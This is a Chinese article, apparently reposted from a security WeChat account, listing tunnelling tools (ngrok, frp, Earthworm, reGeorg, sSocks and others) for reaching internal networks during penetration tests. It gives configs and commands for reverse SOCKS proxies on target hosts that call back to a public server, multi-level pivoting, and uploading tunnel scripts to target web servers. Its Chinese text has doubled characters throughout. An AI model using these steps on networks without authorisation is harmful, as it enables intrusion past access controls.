好用的內(nèi)網(wǎng)穿透工具合集
本文轉(zhuǎn)載自微信公眾號(hào)「Bypass 」,作者Bypass 。轉(zhuǎn)載本文請(qǐng)聯(lián)系Bypass公眾號(hào)。
在滲透過程中,我們需要快速實(shí)現(xiàn)內(nèi)網(wǎng)穿透,從而繞過網(wǎng)絡(luò)訪問限制,直接從外網(wǎng)來訪問內(nèi)網(wǎng)。今天,我們來推薦幾款非常好用的內(nèi)網(wǎng)穿透工具,如有其它推薦,歡迎補(bǔ)充和指正。
1、ngrok
ngrok 是一個(gè)反向代理,通過在公共的端點(diǎn)和本地運(yùn)行的 Web 服務(wù)器之間建立一個(gè)安全的通道。
官網(wǎng)地址:
- https://ngrok.com
使用步驟:
(1)進(jìn)入ngrok官網(wǎng)注冊(cè)賬號(hào),并下載ngrok。
(2)在目標(biāo)機(jī)器上,填寫授權(quán)碼,運(yùn)行ngrok。
- ./ngrok authtoken 授權(quán)碼
(3)將HTTP隧道轉(zhuǎn)發(fā)到本地端口80,如下圖,通過外網(wǎng)域名即可訪問到本地80端口。
- ./ngrok http 80
2、frp
frp 是一個(gè)高性能的反向代理應(yīng)用,可以幫助您輕松地進(jìn)行內(nèi)網(wǎng)穿透,對(duì)外網(wǎng)提供服務(wù),支持 tcp, http, https 等協(xié)議類型,并且 web 服務(wù)支持根據(jù)域名進(jìn)行路由轉(zhuǎn)發(fā)。
git項(xiàng)目地址:
- https://github.com/fatedier/frp
使用步驟:
(1)將 frps 及 frps.ini 放到有公網(wǎng) IP 的機(jī)器上,修改frps.ini文件,配置一個(gè)名為ssh的反向代理:
- # frps.ini
- [common]
- bind_port = 7000
- [ssh]
- listen_port=6000
- auth_token=123
(2)啟動(dòng)frps:
- ./frps -c ./frps.ini
(3)將 frpc 及 frpc.ini 放到處于內(nèi)網(wǎng)環(huán)境的機(jī)器上,修改 frpc.ini 文件,設(shè)置 frps 所在服務(wù)器的 IP 為 x.x.x.x:
- # frpc.ini
- [common]
- server_addr = 192.168.172.131
- server_port = 7000
- auth_token =123
- [ssh]
- type = tcp
- local_ip = 127.0.0.1
- local_port = 22
- remote_port = 6000
(4)啟動(dòng)frpc:
- ./frpc -c ./frpc.ini
(5)通過ssh訪問內(nèi)網(wǎng)服務(wù)器,假設(shè)用戶名為test:
- ssh -p 6000 test@x.x.x.x
3、Sunny-Ngrok
一條命令解決的外網(wǎng)訪問內(nèi)網(wǎng)問題,無需任何配置,一條命令讓外網(wǎng)訪問您的內(nèi)網(wǎng)不再是距離。Ngrok客戶端,支持Windows、Linux、Mac,提供python、PHP等版本。
官網(wǎng)地址:
- https://www.ngrok.cc
使用步驟:
(1) 開通http隧道,設(shè)置隧道協(xié)議、本地端口等信息。
(2)通過隧道id啟動(dòng)隧道。
(3)在公網(wǎng)上訪問域名,即可訪問到內(nèi)網(wǎng)的網(wǎng)站。
4、Natapp
基于ngrok的內(nèi)網(wǎng)映射工具,免費(fèi)版本提供http,tcp,udp全隧道穿透、隨機(jī)域名/隨機(jī)TCP,UDP端口、不定時(shí)強(qiáng)制更換域名/端口和自定義本地端口。
下載地址:
- https://natapp.cn
(1)購買隧道,設(shè)置隧道協(xié)議和本地端口。
(2)下載客戶端,到目標(biāo)主機(jī),運(yùn)行natapp。
(3)將natapp分配的網(wǎng)址復(fù)制下來,在瀏覽器中訪問,可以看到內(nèi)網(wǎng)穿透成功了!
5、Earthworm 內(nèi)網(wǎng)穿透
EW 是一套便攜式的網(wǎng)絡(luò)穿透工具,具有 SOCKS v5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能,可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透。
支持Windows、Linux、MacOS、Arm-Linux。
項(xiàng)目地址:
- http://rootkiter.com/EarthWorm
使用方法:
(1)正向 SOCKS v5 服務(wù)器,適用于目標(biāo)網(wǎng)絡(luò)邊界存在公網(wǎng)IP且可任意開監(jiān)聽端口。
- ./ew -s ssocksd -l 1080
(2)反彈SOCKS v5 服務(wù)器,適用于目標(biāo)網(wǎng)絡(luò)邊界不存在公網(wǎng) IP,需要通過反彈方式創(chuàng)建 socks 代理
- a) 先在一臺(tái)具有公網(wǎng) ip 的主機(jī)A上運(yùn)行以下命令:
- ./ew -s rcsocks -l 1080 -e 8888
- b) 在目標(biāo)主機(jī)B上啟動(dòng) SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機(jī)的 8888端口
- ./ew -s rssocks -d 1.1.1.1 -e 8888
(3)多級(jí)級(jí)聯(lián),適用于多層級(jí)的復(fù)雜網(wǎng)絡(luò)環(huán)境,將內(nèi)網(wǎng)深層的服務(wù)轉(zhuǎn)發(fā)到外網(wǎng)。
- ## 二級(jí)級(jí)聯(lián)測試用例
- # 方式一:利用lcx_tran
- $ ./ew -s ssocksd -l 9999
- $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
- # 方式二:
- $ ./ew -s lcx_listen -l 1080 -e 8888
- $ ./ew -s ssocksd -l 9999
- $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
- ## 三級(jí)級(jí)聯(lián)測試用例
- $ ./ew -s rcsocks -l 1080 -e 8888
- $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
- $ ./ew -s lcx_listen -l 9999 -e 7777
- $ ./ew -s rssocks -d 127.0.0.1 -e 7777
6、reDuh
ReDuh 是一個(gè)通過 HTTP 協(xié)議建立隧道傳輸各種其他數(shù)據(jù)的工具,通過在服務(wù)器上傳JSP/PHP/ASP腳本,就可以輕易地連接到服務(wù)器后面的主機(jī)。
github項(xiàng)目地址:
- https://github.com/sensepost/reDuh
(1)上傳服務(wù)端jsp腳本到目標(biāo)機(jī)器
(2)使用reDuh客戶端連接服務(wù)端腳本上傳后的地址。
- java -jar reDuhClient.jar http://192.168.172.1/reDuh.jsp
7、reGeorg
reGeorg是reDuh的繼承者,利用了會(huì)話層的socks5協(xié)議,結(jié)合Proxifier使用效率會(huì)更高。
下載地址:
- https://github.com/sensepost/reGeorg
使用方法:
(1)1、將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務(wù)器,訪問顯示“Georg says, ‘All seems fine’“,表示腳本運(yùn)行正常。
(2)在攻擊者機(jī)器上,啟動(dòng)reGeorgSocksProxy.py,監(jiān)聽9999端口,看到 Checking if Georg is ready,確認(rèn)正常運(yùn)行。
8、Tunna
Tunna是一款神奇的工具,它可以通過HTTP封裝隧道通信任何TCP,以及用于繞過防火墻環(huán)境中的網(wǎng)絡(luò)限制。
github項(xiàng)目地址:
- https://github.com/SECFORCE/Tunna
9、sSocks
sSocks是一個(gè)socks代理工具套裝,可用來開啟socks代理服務(wù),支持socks5驗(yàn)證,支持IPV6和UDP,并提供反向socks代理服務(wù),即將遠(yuǎn)程計(jì)算機(jī)作為socks代理服務(wù)端,反彈回本地,極大方便內(nèi)網(wǎng)的滲透測試。
下載地址:
- http://sourceforge.net/projects/ssocks/
使用方法:
(1)正向代理
- ./ssocksd --bind 192.168.172.131 --port 1234
(2)反向代理
- ## 監(jiān)聽6020端口轉(zhuǎn)發(fā)到6010
- ./rcsocks -l 6020 -p 6010 -vv
- ## 反向連接代理主機(jī)6010端口
- ./rssocks -s 192.168.172.131:6010 -vv